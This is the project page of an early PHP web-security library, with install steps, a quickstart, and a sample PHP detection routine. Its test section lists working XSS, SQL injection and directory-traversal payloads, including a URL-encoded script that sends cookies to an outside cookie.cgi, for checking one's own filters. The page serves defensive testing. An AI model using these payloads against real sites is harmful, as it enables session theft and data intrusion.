The WASP Project


WASP is a library for various web development environments (PHP, Python, Perl, Ruby, etc.) with the following characteristics:
  1. Detect possible attacks (like an IDS, but at script level)
  2. Make web applications MORE SECURE (at the moment only with PHP)
  3. Functions to correctly SANITIZE strings
  4. Easy encryption
  5. Control by IP and MAC address

Status

At the moment only the PHP version exists; the Python version will be published shortly.

PHP Sec, A security library for PHP

Currently (Sat Sep 25 2004) this library can:
  1. Detect SQL injection, cross-site scripting, directory traversal and various other web attacks
  2. Sanitize strings by removing meta-characters (XSS, SQL injection, etc.)
  3. Encrypt/decrypt data easily with two functions (built on libmcrypt through PHP's mcrypt extension; note that the mcrypt extension was deprecated in PHP 7.1 and removed from core in PHP 7.2)
  4. Gather (very basic) information about the client host

Download

You can download a gzipped package file with the nightly CVS tree tarball.

CVS Access (Recommended)

This project's CVS repository can be checked out through anonymous CVS over SSH with the following commands. The module you wish to check out must be given as the module name (here: wasp). When prompted for a password for anoncvs, simply press the Enter key. Before accepting the host key on first connection, compare it against the fingerprints below.

The SSHv2 public key fingerprints for the machine hosting the cvs trees are:

RSA: 1024 80:5a:b0:0c:ec:93:66:29:49:7e:04:2b:fd:ba:2c:d5
DSA: 1024 4d:c8:dc:9a:99:96:ae:cc:ce:d3:2b:b0:a3:a4:95:a5

Software repository:

export CVS_RSH="ssh"
cvs -z3 -d:ext:anoncvs@savannah.nongnu.org:/cvsroot/wasp co wasp

Browse CVS

You can browse the CVS repository at the savannah.nongnu.org site.

Basic samples?

The CVS repository contains six simple samples that exercise the library. You can view them online (but not run them) by browsing the samples directory in the CVS repository.

Quickstart?

The quickest way to start using the library is to add the following lines to your PHP script:

include("php_sec.php"); // the library

if (!sec_paranoid_check_all_params())
{
    die("Attack detected. STOP");
}

Next, try to attack your PHP script with common (or uncommon) SQL injection, cross-site scripting and similar attacks. For example, if your application has a form, try submitting any (or all) of the following XSS payloads:
  1. "><script>alert(document.cookie)</script>
  2. "><img src="image.png" onclick="javascript:alert(document.cookie)">
  3. "><h1>Hi!</h1>
You can also try URL-encoded (hexadecimal) payloads, which a filter only catches if it decodes the parameter before matching, such as:

  1. %3c%73%63%72%69%70%74%3e%64%6f%63%75%6d%65%6e%74%2e%6c%6f%63%61%74%69%6f%6e%3d%27%68%74%74%70%3a%2f%2f%77%77%77%2e%63%67%69%73%65%63%75%72%69%74%79%2e%63%6f%6d%2f%63%67%69%2d%62%69%6e%2f%63%6f%6f%6b%69%65%2e%63%67%69%3f%27%20%2b%64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%3c%2f%73%63%72%69%70%74%3e
     (decodes to: <script>document.location='http://www.cgisecurity.com/cgi-bin/cookie.cgi?' +document.cookie</script>)
  2. %3e%3c%73%63%72%69%70%74%3e%64%6f%63%75%6d%65%6e%74%2e%6c%6f%63%61%74%69%6f%6e%3d%27%68%74%74%70%3a%2f%2f%77%77%77%2e%63%67%69%73%65%63%75%72%69%74%79%2e%63%6f%6d%2f%63%67%69%2d%62%69%6e%2f%63%6f%6f%6b%69%65%2e%63%67%69%3f%27%20%2b%64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%3c%2f%73%63%72%69%70%74%3e
     (the same payload preceded by a closing ">")

Or any SQL injection payload. Samples:

  1. ' or 1=1--
  2. "/*" and "*/", or "{" and "}" (evasion techniques for ANSI SQL and Informix databases, respectively)
  3. ' union select bla, bla, bla, bla


Or directory traversal attacks. More samples:

  1. /../../../../../../../etc/passwd
  2. %5c..%5c%2e%2e%5c..%5c..%5c..%5cboot.ini
  3. %2f.%2e%2F%2e%2E/../foobar
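As an added illustration (this is not code from WASP or PHP Sec, whose internals are not shown on this page), the following PHP sketches what a paranoid parameter check has to do in order to catch the payloads listed above: URL-decode each value first, so the hexadecimal forms are seen as the <script> they encode, and then match a small set of signatures per attack class. The function names (sec_canonicalize, sec_rules, sec_detect, sec_check_params) and the patterns are this example's own assumptions, and the sample request is constructed from the payloads above plus two benign values.

```php
<?php
// Added example, not the WASP/PHP Sec code: a minimal signature-based
// parameter check in the spirit of sec_paranoid_check_all_params().
// All function names and patterns here are this example's own.
declare(strict_types=1);

// Canonicalize before matching: URL-decode repeatedly (bounded, so a
// pathological input cannot loop forever) and lower-case, so "%3c%73%63..."
// and "<SCRIPT>" are compared in the same form as "<script>".
function sec_canonicalize(string $value, int $maxRounds = 3): string
{
    for ($i = 0; $i < $maxRounds; $i++) {
        $next = urldecode($value);   // %xx -> byte, '+' -> space
        if ($next === $value) {
            break;                   // nothing left to decode
        }
        $value = $next;
    }
    return strtolower($value);
}

// Signature rules per attack class, applied to the canonical value.
// Deliberately small; they mirror the attack classes listed on this page.
function sec_rules(): array
{
    return [
        'xss' => [
            '/<\s*script\b/',                                        // <script ...>
            '/<\s*\/?\s*(img|iframe|h1|svg|body|object|embed)\b/',  // tag injection
            '/\bon[a-z]+\s*=/',                                      // onclick=, onerror=
            '/javascript\s*:/',                                      // javascript: URLs
        ],
        'sqli' => [
            '/\'\s*(or|and)\s+\S+\s*=\s*\S+/',  // ' or 1=1
            '/\bunion\s+(all\s+)?select\b/',    // ' union select ...
            '/--\s*$/',                         // trailing SQL comment
            '/\/\*.*\*\//s',                    // /* ... */ evasion (ANSI SQL)
            '/\{.*\}/s',                        // { ... } evasion (Informix); over-broad
        ],
        'traversal' => [
            '/(\.\.[\/\\\\])+/',                // ../ or ..\ sequences
            '/\/etc\/passwd\b/',
            '/boot\.ini\b/',
        ],
    ];
}

// Return the first matching attack class for a value, or null if clean.
function sec_detect(string $value): ?string
{
    $canon = sec_canonicalize($value);
    foreach (sec_rules() as $class => $patterns) {
        foreach ($patterns as $re) {
            if (preg_match($re, $canon) === 1) {
                return $class;
            }
        }
    }
    return null;
}

// Check every parameter name and value (array values are flattened).
// Returns [['name' => ..., 'class' => ...], ...]; an empty array means clean.
function sec_check_params(array $params): array
{
    $hits = [];
    foreach ($params as $name => $value) {
        $text  = is_array($value) ? implode(' ', $value) : (string) $value;
        $class = sec_detect((string) $name) ?? sec_detect($text);
        if ($class !== null) {
            $hits[] = ['name' => (string) $name, 'class' => $class];
        }
    }
    return $hits;
}

// Constructed sample request: two benign values plus payloads from this page.
$samples = [
    'q'     => 'hello world',
    'price' => '19.99',
    'xss1'  => '"><script>alert(document.cookie)</script>',
    'xss2'  => '"><img src="image.png" onclick="javascript:alert(document.cookie)">',
    'hex'   => '%3c%73%63%72%69%70%74%3e%64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65',
    'sql1'  => "' or 1=1--",
    'sql2'  => "' union select bla, bla, bla, bla",
    'dir1'  => '/../../../../../../../etc/passwd',
    'dir2'  => '%5c..%5c%2e%2e%5c..%5c..%5c..%5cboot.ini',
];

foreach (sec_check_params($samples) as $hit) {
    printf("%-6s %s\n", $hit['name'], $hit['class']);
}

// Wired into a script, the check takes the place of the quickstart's library call:
// if (sec_check_params($_GET + $_POST) !== []) { http_response_code(400); exit; }
```

A check of this kind is a last line of defence, not a fix: keep using prepared statements for SQL and htmlspecialchars() when echoing input into HTML. Signature lists both over-match (the { ... } rule above flags any JSON-looking value) and under-match (a payload that needs a fourth round of decoding, or an event handler spelled with HTML entities, slips past), so treat a hit as grounds to reject and log the request rather than as proof of an attack.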

Documentation

You can browse the on-line documentation or download it from the CVS repository.

Bugs

Bugs? What bugs? Send me any that you find.
Copyright (c) 2004 Jose Antonio Coret